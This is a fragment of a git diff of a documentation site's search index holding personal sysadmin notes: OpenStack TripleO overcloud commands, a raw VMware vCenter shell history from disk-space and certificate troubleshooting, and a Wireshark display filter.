    "},{"location":"tripleo/#get-extra-hardware-specs-from-ironic","title":"Get extra-hardware-specs from Ironic.","text":"
    openstack baremetal introspection data save 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#delete-deployed-overcloud","title":"Delete deployed Overcloud","text":"
    (undercloud) [stack@ooo-director ~]$ openstack stack list\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| ID                                   | Stack Name | Project                          | Stack Status       | Creation Time        | Updated Time |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n| a078f570-c4fa-46bc-87d5-ebb2c99684e4 | overcloud  | 8a6fa7c4e66a422281bd800007c65e4d | CREATE_IN_PROGRESS | 2019-12-26T04:00:21Z | None         |\n+--------------------------------------+------------+----------------------------------+--------------------+----------------------+--------------+\n\n#Might need to do 2-3 times... (not sure why)\n(undercloud) [stack@ooo-director ~]$ openstack stack delete a078f570-c4fa-46bc-87d5-ebb2c99684e4\nAre you sure you want to delete this stack(s) [y/N]? y\n\n\nopenstack overcloud plan delete overcloud\n
    "},{"location":"tripleo/#list-overcloud-nodes-profiles","title":"List Overcloud nodes profiles","text":"
    openstack overcloud profiles list\n
    "},{"location":"tripleo/#set-computecontroller-profile","title":"Set compute/controller profile","text":"
    openstack baremetal node set --property capabilities='profile:compute,boot_option:local' \n
    "},{"location":"vmware/","title":"Vmware","text":"
    1  df -h\n2  cd /storage/log/\n3  ls\n4  cd vmware/\n5  ls\n6  du -a /var | sort -n -r | head -n 10\n7  du h-a /var | sort -n -r | head -n 10\n8  df -h\n9  cd ..\n

    10 du h-a /var | sort -n -r | head -n 10 11 cd /var/log/ 12 ls 13 du -ha /var | sort -n -r | head -n 10 14 ls -alh 15 cd vmware 16 ls 17 du -ha /var | sort -n -r | head -n 10 18 ls -alh 19 du -ha /var | sort -n -r | head -n 100 20 ls -alh /storage/log/vmware/sso/tomcat/ 21 du -hs /storage/log/vmware/sso/tomcat/ 22 du -hs /storage/log/vmware 23 du -hs /storage/log/vmware/eam/ 24 du -hs /storage/log/vmware/lookupsvc/ 25 du -hs /storage/log/vmware/lookupsvc/tomcat/ 26 ls -alh /storage/log/vmware/lookupsvc/tomcat/ 27 du -hs /storage/log/vmware/lookupsvc/tomcat/ 28 rm /storage/log/vmware/lookupsvc/tomcat/localhost_access.2021- 29 df -h 30 /usr/lib/vmware-vmca/bin/certificate-manager 31 cat /var/log/vmware/vmcad/certificate-manager.log 32 ping colo.coldnorthadmin.com 33 /usr/lib/vmware-vmca/bin/certificate-manager 34 ping 10.199.199.1 35 dig google.ca 36 dig colo.coldnorthadmin.com 37 dig vcenter.colo.coldnorthadmin.com 38 clear 39 /usr/lib/vmware-vmca/bin/certificate-manager 40 cd/etc/vmware-sso 41 cd /etc/vmware-sso 42 ls 43 cd keys/ 44 ls 45 history | grep vcenter 46 ls 47 ls -alh 48 cat ssoserverRoot.crt 49 htop 50 top 51 service-control --status 52 toptop 53 top 54 service-control --status 55 watch -n 1 \"service-control --status\" 56 cd /etc/ssl/certs 57 ls 58 ls -alh 59 service-control 60 service-control --help 61 service-control --start vmware-vapi-endpoint 62 service-control 63 service-control --list-status 64 service-control --status 65 /usr/lib/vmware-vmafd/bin/dir-cli 66 cd /usr/lib/vmware-vmafd/bin/dir-cli 67 tail -n 100 /var/log/vmware/vpxd/vpxd.log 68 date 69 tail -n 100 /var/log/vmware/vpxd/vpxd.log 70 grep -ir ssl /var/log/vmware/vpxd/vpxd.log 71 cd /etc/vm 72 cd /etc/vmware 73 ls 74 cat backup/ 75 cat .buildInfo 76 /usr/lib/vmware-vmca/bin/certificate-manager 77 cd /tmp/vmware-root 78 ls 79 cd /var/log/vmware 80 ls 81 tail -n 100 vpxd/vpxd.log 82 service-control --status 83 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store TRUSTED_ROOTS --text | 
less 84 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text | less 85 usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 86 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store MACHINE_SSL_CERT --text 87 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vpxd --text | less 88 /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store vsphere-webclient --text | less 89 cd /tmp/ 90 vi fixsts.sh 91 chmod +x fixsts.sh 92 ./fixsts.sh 93 service-control --stop --all 94 service-control --start --all 95 top 96 cd /var/log/vmware/vapi/ 97 ls 98 cd endpoint/ 99 ls 100 tail -n 100 -f endpoint.log 101 /usr/lib/vmware-vmca/bin/certificate-manager 102 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 103 ping vcenter.colo.coldnorthadmin.com 104 reset 105 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 106 /usr/lib/vmware-vmca/bin/certificate-manager 107 cat /etc/hostname 108 /usr/lib/vmware-vmca/bin/certificate-manager 109 tail -n 100 /var/log/vmware/vmcad/certificate-manager.log 110 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://localhost:7080/lookupservice/sdk | less 111 python /usr/lib/vmidentity/tools/scripts/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 112 ls /usr/lib/vmidentity/tools/scripts/lstool.py 113 ls /usr/lib/vmware-lookupsvc/tools/lstool.py 114 python /usr/lib/vmware-lookupsvc/tools/lstool.py list --url http://vcenter.colo.coldnorthadmin.com:7080/lookupservice/sdk | less 115 clear 116 cd /usr/lib/vmware/site-packages/cis 117 ls 118 cp certificateManagerHelper.py certificateManagerHelper.py.bak 119 vi certificateManagerHelper.py 120 reset 121 /usr/lib/vmware-vmca/bin/certificate-manager 122 clear 123 htop 124 clear 125 df -h 126 history

    "},{"location":"wireshark/","title":"Wireshark","text":""},{"location":"wireshark/#get-packets-containing-a-specific-string","title":"Get packets containing a specific string.","text":"
    frame contains potato\n
    "}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 9090924c859238c6dac72b0016c9428a4f7ae772..bdea8a1f6ae9a281178fcceed9cb6ab414abda7e 100644 GIT binary patch delta 13 Ucmb=gXP58h;0UM;o5)@P02?3!?*IS* delta 13 Ucmb=gXP58h;Bc_wpU7ST02pZlSpWb4